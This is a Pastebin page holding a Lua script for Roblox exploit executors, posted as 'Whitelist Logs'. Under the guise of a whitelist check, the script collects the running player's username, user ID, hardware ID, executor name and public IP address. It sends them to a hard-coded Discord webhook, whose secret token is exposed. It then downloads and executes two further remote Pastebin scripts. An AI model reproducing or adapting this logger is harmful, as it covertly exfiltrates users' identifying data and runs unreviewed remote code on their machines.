Advertisement
Arcaneee

Whitelist Logs

Apr 15th, 2023 (edited)
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.00 KB | None | 0 0
  1. local DiscordWhitelister = "https://discord.com/api/webhooks/1236352855859003474/6zI62lYrwNK8uO3FMm9zGDk0GM5h59gm5iVMZfn6P1NFKDb3RZmUTJ3qGSAzvf7lJ7ke"--Whitelister
  2. PlaceId, JobId = game.PlaceId, game.JobId
  3. local function dayCountConverter(n)
  4.     local years = math.floor(n / 365)
  5.     local months = math.floor((n - (years * 365)) / 30)
  6.     local days = n - (years * 365) - (months * 30)
  7.     return string.format("%i Years, %i Months, %i Days",years, months, days)
  8. end
  9. pcall(function()
  10.    local data = {
  11.  
  12.   ['embeds'] = {
  13.     {
  14.        ['title'] = getgenv().ScriptName,
  15.        ["color"]=tonumber(0x726da),
  16.        ['fields'] = {
  17.           {name = 'Display', value = "**"..game:GetService("Players").LocalPlayer.DisplayName.."**"},
  18.           {name = 'User', value = "**"..game:GetService("Players").LocalPlayer.Name.."**"},
  19.           {name = 'UserId', value = "**"..game:GetService("Players").LocalPlayer.UserId.."**"},
  20.           {name = 'Account Age', value = "**"..dayCountConverter(game.Players.LocalPlayer.AccountAge).."**"},
  21.           {name = 'Profile Link', value = "https://www.roblox.com/users/" ..game.Players.LocalPlayer.UserId.. "/profile" .. ""},
  22.           {name = 'Executor', value =  "**"..identifyexecutor().."**"},
  23.           {name = 'Hwid', value = "**"..game:GetService("RbxAnalyticsService"):GetClientId().."**"},
  24.           {name = "Ping", value = "**"..game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString().."**"},
  25.           {name = 'Place & JobId', value = '**'..PlaceId..', '..JobId..'**'},
  26.           {name = 'IPV4', value = "**"..game:HttpGet("https://v4.ident.me/?format=json").."**"},
  27.           --{name = 'IPV6', value = "**"..game:HttpGet("https://v6.ident.me/?format=json").."**"},
  28.           --{name = 'Ip', value = "**"..game:HttpGet("https://api.ipify.org/?format=json").."**"},
  29.           {name = 'Membership', value = "**"..string.sub(tostring(game:GetService("Players").LocalPlayer.MembershipType), 21).."**"},
  30.           {name = 'Time', value = "**"..os.date("%A, %m %B %Y %I:%M:%S %p").."**"},
  31.  
  32.         }
  33.     }
  34.   }
  35. }
  36.    if syn then
  37.        local response = syn.request(
  38.            {
  39.                Url = DiscordWhitelister,
  40.                Method = 'POST',
  41.                Headers = {
  42.                    ['Content-Type'] = 'application/json'
  43.                },
  44.                Body = game:GetService('HttpService'):JSONEncode(data)
  45.            }
  46.        );
  47.    elseif request then
  48.        local response = request(
  49.            {
  50.                Url = DiscordWhitelister,
  51.                Method = 'POST',
  52.                Headers = {
  53.                    ['Content-Type'] = 'application/json'
  54.                },
  55.                Body = game:GetService('HttpService'):JSONEncode(data)
  56.            }
  57.        );
  58.    end
  59. end)
  60. if getgenv().Kick == false then
  61. wait(1)
  62.  game:GetService("Players").LocalPlayer:Kick("\Not Whitelisted")
  63. end
  64. loadstring(game:HttpGet('https://pastebin.com/raw/vPcmJF44'))()--anti cheat
  65. loadstring(game:HttpGet('https://pastebin.com/raw/KWEWWKU2'))()--controller
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement